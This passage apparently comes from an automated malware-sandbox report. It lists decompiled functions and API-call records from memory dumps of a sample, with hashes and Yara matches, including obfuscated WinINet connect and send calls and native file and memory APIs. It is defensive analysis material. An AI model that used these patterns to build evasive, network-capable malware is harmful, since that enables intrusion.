                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E018C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}










                                              0x018cfdda
                                              0x018cfde2
                                              0x018cfde5
                                              0x018cfdec
                                              0x018cfdfa
                                              0x018cfdff
                                              0x018cfe0a
                                              0x018cfe0f
                                              0x018cfe17
                                              0x018cfe1e
                                              0x018cfe19
                                              0x018cfe19
                                              0x018cfe19
                                              0x018cfe20
                                              0x018cfe21
                                              0x018cfe22
                                              0x018cfe25
                                              0x018cfe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018CFDFA
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018CFE01
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018CFE2B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 19486b5f69366f4d91e49d849f9ef96c949b28d11eafcc232ad46024697e4562
                                              • Instruction ID: 8c3367f50a679f9f1a756d35001e7a0fe2eda918559bb154e23914ca4e5c59d4
                                              • Opcode Fuzzy Hash: 19486b5f69366f4d91e49d849f9ef96c949b28d11eafcc232ad46024697e4562
                                              • Instruction Fuzzy Hash: 5FF0FC32200101BFEA211A49DC05F237F5BDB44B30F144318F724961D1DA72FA6086F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCA50(intOrPtr _a4) {
                                              				struct %anon38 _v40;
                                              				intOrPtr _t23;
                                              
                                              				_v40.lStructSize = 0;
                                              				_v40.hwndOwner = 0;
                                              				_v40.hInstance = 0;
                                              				_v40.rgbResult = 0;
                                              				_v40.lpCustColors = 0;
                                              				_v40.Flags = 0;
                                              				_v40.lCustData = 0;
                                              				_v40.lpfnHook = 0;
                                              				_v40.lpTemplateName = 0;
                                              				_v40.lStructSize = 0x24;
                                              				_v40.hwndOwner = _a4;
                                              				_v40.lpCustColors = 0x305948;
                                              				_t23 =  *0x304a00; // 0xffffff
                                              				_v40.rgbResult = _t23;
                                              				_v40.Flags = 3;
                                              				ChooseColorW( &_v40);
                                              				return _v40.rgbResult;
                                              			}





                                              0x002fca58
                                              0x002fca5b
                                              0x002fca5e
                                              0x002fca61
                                              0x002fca64
                                              0x002fca67
                                              0x002fca6a
                                              0x002fca6d
                                              0x002fca70
                                              0x002fca73
                                              0x002fca7d
                                              0x002fca80
                                              0x002fca87
                                              0x002fca8d
                                              0x002fca90
                                              0x002fca9b
                                              0x002fcaa7

                                              APIs
                                              • ChooseColorW.COMDLG32(00000024), ref: 002FCA9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ChooseColor
                                              • String ID: $$HY0
                                              • API String ID: 2281747019-3994700921
                                              • Opcode ID: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction ID: b252ff451443ef245a48edfba134aa7b02e4529d1b699c573de1526c769efafe
                                              • Opcode Fuzzy Hash: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction Fuzzy Hash: 22F017B4D052099FCB81DFA9D9496AEBBF4BB08310F20456AD908F3340E7755A44CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F540D(char _a4) {
                                              				struct HINSTANCE__** _t5;
                                              
                                              				if(_a4 == 0) {
                                              					_t5 = 0x305620;
                                              					do {
                                              						if( *_t5 != 0) {
                                              							if( *_t5 != 0xffffffff) {
                                              								FreeLibrary( *_t5);
                                              							}
                                              							 *_t5 =  *_t5 & 0x00000000;
                                              						}
                                              						_t5 =  &(_t5[1]);
                                              					} while (_t5 != 0x305670);
                                              				}
                                              				return 1;
                                              			}




                                              0x002f5416
                                              0x002f5419
                                              0x002f541e
                                              0x002f5421
                                              0x002f5426
                                              0x002f542a
                                              0x002f542a
                                              0x002f5430
                                              0x002f5430
                                              0x002f5433
                                              0x002f5436
                                              0x002f543e
                                              0x002f5442

                                              APIs
                                              • FreeLibrary.KERNEL32(00305620), ref: 002F542A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: V0$pV0
                                              • API String ID: 3664257935-2562600905
                                              • Opcode ID: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction ID: 55738b24e014b095ddc245c200214a5d48684adbd488d9da3631c053ac046ecb
                                              • Opcode Fuzzy Hash: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction Fuzzy Hash: 40E04F3682196E9ADB320E08E408371BAD49750376F95553AD6DC121E092751CE1DA81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,008B3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,008B3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 008B821D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction ID: cdbae740e94a3fbee9798ff93ff784d5e01b7ea1d561afa6421b93953d0587d9
                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction Fuzzy Hash: 5DF0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(008B3D62,5E972F59,FFFFFFFF,008B3A21,?,?,008B3D62,?,008B3A21,FFFFFFFF,5E972F59,008B3D62,?,00000000), ref: 008B82C5
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction ID: 8111d43cfca7d73c103077af3b9d999ee206fc6042b3b5fbe6e14d41dddbbddd
                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction Fuzzy Hash: 53F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158649BA1D97241DA30E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008A2D11,00002000,00003000,00000004), ref: 008B83E9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 888ca3871c5010298ba7c4df96c0a93331b8e68e5c089ebcd3260efd7ede2dec
                                              • Instruction ID: 4a1e3c92f1b6406b73426cf2adf7d4be4ad6633f5babaf2dcf1b413b13fbaf49
                                              • Opcode Fuzzy Hash: 888ca3871c5010298ba7c4df96c0a93331b8e68e5c089ebcd3260efd7ede2dec
                                              • Instruction Fuzzy Hash: 02F015B6200109AFDB24DF98DC81EEB77ADFF98754F158649FA0997241CA31E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008A2D11,00002000,00003000,00000004), ref: 008B83E9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction ID: 1ee823ad3305cc5f75402fa01277466d1c91ff56b5ecbd721fa6449672957ccf
                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction Fuzzy Hash: 9BF015B2200208ABCB14DF89CC81EEB77ADEF88750F158549BE0897241C630F810CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(008B3D40,?,?,008B3D40,00000000,FFFFFFFF), ref: 008B8325
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction ID: 4157eee80bf03b8dc7551d259062169ceb2041c32dfee79b8209f6fec1f90881
                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction Fuzzy Hash: 2BD01275200218ABD710EF98CC45ED7775CEF44750F154455BA189B242C570F90087E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 51fcc739614a9ea7e024dea1d921a97205a5f0a5d133e7d0b4868d305eccdc08
                                              • Instruction ID: 1fcc0cc3b1ec398368d27cd00e11ca28d021a1da7ff30fb68629c6ded9f7653d
                                              • Opcode Fuzzy Hash: 51fcc739614a9ea7e024dea1d921a97205a5f0a5d133e7d0b4868d305eccdc08
                                              • Instruction Fuzzy Hash: 59900261242041527545B15984049074047A7F0285791C516E2409A64C8566E85AE661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 43edc05202c9390f1561539c151816c2c616ab1acb65951e6853ae6bb902fa78
                                              • Instruction ID: 1047f2f8504e5e1dbeca0f3691b82a9f87e65a1c758e149b257664b2c00d3cc9
                                              • Opcode Fuzzy Hash: 43edc05202c9390f1561539c151816c2c616ab1acb65951e6853ae6bb902fa78
                                              • Instruction Fuzzy Hash: 3690027120100413F11171598504B07004A97E0285F91C916E141966CD9696D956B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: eea4b8b4864ed92174382ae70b5684471e27bb7f7a023817e514829b148d4721
                                              • Instruction ID: c2a98481ffef34cd6ad24a8056f55aa9f8866e559758a876667793e45091ed0f
                                              • Opcode Fuzzy Hash: eea4b8b4864ed92174382ae70b5684471e27bb7f7a023817e514829b148d4721
                                              • Instruction Fuzzy Hash: 1D9002A134100442F10071598414F060046D7F1345F51C519E2059668D8659DC567166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 14aed4b9215355a7803ca447bd82037434418aff754ff9dbf7f9c7cdca074833
                                              • Instruction ID: 668024f7d11613b3258b62406c204fc157050477a39b30566b8ce753b8075fdf
                                              • Opcode Fuzzy Hash: 14aed4b9215355a7803ca447bd82037434418aff754ff9dbf7f9c7cdca074833
                                              • Instruction Fuzzy Hash: BE9002A120200003610571598414A16404B97F0245B51C525E20096A4DC565D8957165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4e48cfe0badccc412d0207611d0df27cfe632784cd1c0f2fe0737f8bf1f572dd
                                              • Instruction ID: 7489db12047048ef637df57e0e69442ff4ccda0bfc0e1caaec43c27df30c3919
                                              • Opcode Fuzzy Hash: 4e48cfe0badccc412d0207611d0df27cfe632784cd1c0f2fe0737f8bf1f572dd
                                              • Instruction Fuzzy Hash: D59002B120100402F14071598404B46004697E0345F51C515E6059668E8699DDD976A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cb4aebaffda55ee58cc9ceeebaef4e60856a45cb1414f2d8b58415ff32088ed8
                                              • Instruction ID: 1e7778d6aee0fd99856b89aaafdd433f3b2028ed554fdd43108a44042b2f6ede
                                              • Opcode Fuzzy Hash: cb4aebaffda55ee58cc9ceeebaef4e60856a45cb1414f2d8b58415ff32088ed8
                                              • Instruction Fuzzy Hash: 99900265211000032105B5594704907008797E5395351C525F200A664CD661D8656161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ad9853b180354349ddf43d5593960e1d687169e00f619199a9f93f89bdb103e7
                                              • Instruction ID: fc3df9d2b126234e4e49e552ad14c69942acbfc2bacc105e43b7dfd58e1f0825
                                              • Opcode Fuzzy Hash: ad9853b180354349ddf43d5593960e1d687169e00f619199a9f93f89bdb103e7
                                              • Instruction Fuzzy Hash: 6990027120100842F10071598404F46004697F0345F51C51AE1119768D8655D8557561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c8c91ced2eefc5501c2df2f569afd723f9b62376c0b137de71c4c0a84b2d016b
                                              • Instruction ID: f763d4764f7d2f015f6e09dd40c792fd3183cddf5c860ae4b97d39252fea99e5
                                              • Opcode Fuzzy Hash: c8c91ced2eefc5501c2df2f569afd723f9b62376c0b137de71c4c0a84b2d016b
                                              • Instruction Fuzzy Hash: 2190027120108802F1107159C404B4A004697E0345F55C915E541976CD86D5D8957161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 77a56143934389986ecc23d938f6b153cb004f89c3f73c8ebaef1ff4028d2c52
                                              • Instruction ID: c4962646f9e6c547015f28d56cbcc9ef6a4ce08e321a3030af829a8dd20e2b1c
                                              • Opcode Fuzzy Hash: 77a56143934389986ecc23d938f6b153cb004f89c3f73c8ebaef1ff4028d2c52
                                              • Instruction Fuzzy Hash: 5090026121180042F20075698C14F07004697E0347F51C619E1149668CC955D8656561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: eb00bc5dd60d9fa7f57b428c19cad745bad73cf53156896b2117663c20de142b
                                              • Instruction ID: 35b2ac6996825344f10ccf6661092e1476b178e62bda9d2194e73b6dbdbcc2a2
                                              • Opcode Fuzzy Hash: eb00bc5dd60d9fa7f57b428c19cad745bad73cf53156896b2117663c20de142b
                                              • Instruction Fuzzy Hash: A490027120504842F14071598404E46005697E0349F51C515E10597A8D9665DD59B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d1cc6dcdf7a2c0b8a6b7793a2d79754006b6be75cb32c6b4a8dbc4113f010198
                                              • Instruction ID: bd32bf7c5e78f7000d4002e7b212815f1e1a19d83f031d9607e13760aae10dbd
                                              • Opcode Fuzzy Hash: d1cc6dcdf7a2c0b8a6b7793a2d79754006b6be75cb32c6b4a8dbc4113f010198
                                              • Instruction Fuzzy Hash: 6090027120100802F18071598404A4A004697E1345F91C519E101A768DCA55DA5D77E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f9badab6486bca8a196e1adf1bef7512e9bb1304306781f9bb66c97863c38243
                                              • Instruction ID: ca8134da3c36e5b2ee65513d3f91caaec3e3ab79394ba8f93aee5d2df4d8c145
                                              • Opcode Fuzzy Hash: f9badab6486bca8a196e1adf1bef7512e9bb1304306781f9bb66c97863c38243
                                              • Instruction Fuzzy Hash: 6790026921300002F18071599408A0A004697E1246F91D919E100A66CCC955D86D6361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ea4110478ca31278ad61234f6ea9ce8eb0793e06bdfc3cbbb559f4ed6790504d
                                              • Instruction ID: 8420980e46c2ce40a16e0ad9cdeec5dd03ab5655d3e3c176a42cca86cd61477b
                                              • Opcode Fuzzy Hash: ea4110478ca31278ad61234f6ea9ce8eb0793e06bdfc3cbbb559f4ed6790504d
                                              • Instruction Fuzzy Hash: D290027131114402F1107159C404B06004697E1245F51C915E181966CD86D5D8957162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 11e27f505d7e5591d9b50ebc2c110c6add995975276582c8c45f047ad1c8d0d1
                                              • Instruction ID: ad3c7fbe93b5c3066ae3480b8b097d51de676ff0b5ffc95e327b165f011ebf4f
                                              • Opcode Fuzzy Hash: 11e27f505d7e5591d9b50ebc2c110c6add995975276582c8c45f047ad1c8d0d1
                                              • Instruction Fuzzy Hash: 9990027120100402F10075999408A46004697F0345F51D515E6019669EC6A5D8957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B8948
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpOpenRequest
                                              • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                              • API String ID: 1984915467-4016285707
                                              • Opcode ID: e2f3c66845dad4a079d58a7aadd309ce284a991ece94f85822e95b65ce1da984
                                              • Instruction ID: d2bb4a4300e263bd0737fe063e2292ff97582d60847dc32efe3d458e90399f16
                                              • Opcode Fuzzy Hash: e2f3c66845dad4a079d58a7aadd309ce284a991ece94f85822e95b65ce1da984
                                              • Instruction Fuzzy Hash: 8D0105B2904109AFCB14DF88C841DEF7BB9FB48210F158258FA09A7305C630AD11CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B8948
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpOpenRequest
                                              • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                              • API String ID: 1984915467-4016285707
                                              • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction ID: 51992d86952166a6194c420b7f27c835a5b3352886eee5ce50f1171906c08f86
                                              • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction Fuzzy Hash: 5101D7B2905119ABCB14DF98D841DEF7BBDEB48210F158288FD48A7305D630ED10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 008B89BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-2503632690
                                              • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction ID: 844929c949d6b4f8d8385606af5342ed9d8fc52527f1ffeca4cf5f405645f19f
                                              • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction Fuzzy Hash: 47012CB2905118ABCB00DF98D841AEF7BBCEB44210F148189FD08A7305D670EE10CBE2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 008B89BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-2503632690
                                              • Opcode ID: a33204397b9f433b37466c435445c109003b18bc6a6053b5a18d1c6c681b8905
                                              • Instruction ID: 3108b23b4da42de98c69dfe06db52fdced05a5401c1112eb0e8b7a505d37b7d2
                                              • Opcode Fuzzy Hash: a33204397b9f433b37466c435445c109003b18bc6a6053b5a18d1c6c681b8905
                                              • Instruction Fuzzy Hash: 6F0128B1905119AFCB04DF98C845AEFBB78FF59310F158199FD08AB204D770AA10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B88C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                              • API String ID: 3050416762-1024195942
                                              • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction ID: 16931b03177072630e962e3bc24c7d54413d695536523c506890fda35e571246
                                              • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction Fuzzy Hash: C201D7B2905118AFCB14DF99D941EEF77B9EB48310F158289BE08A7241D670EE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

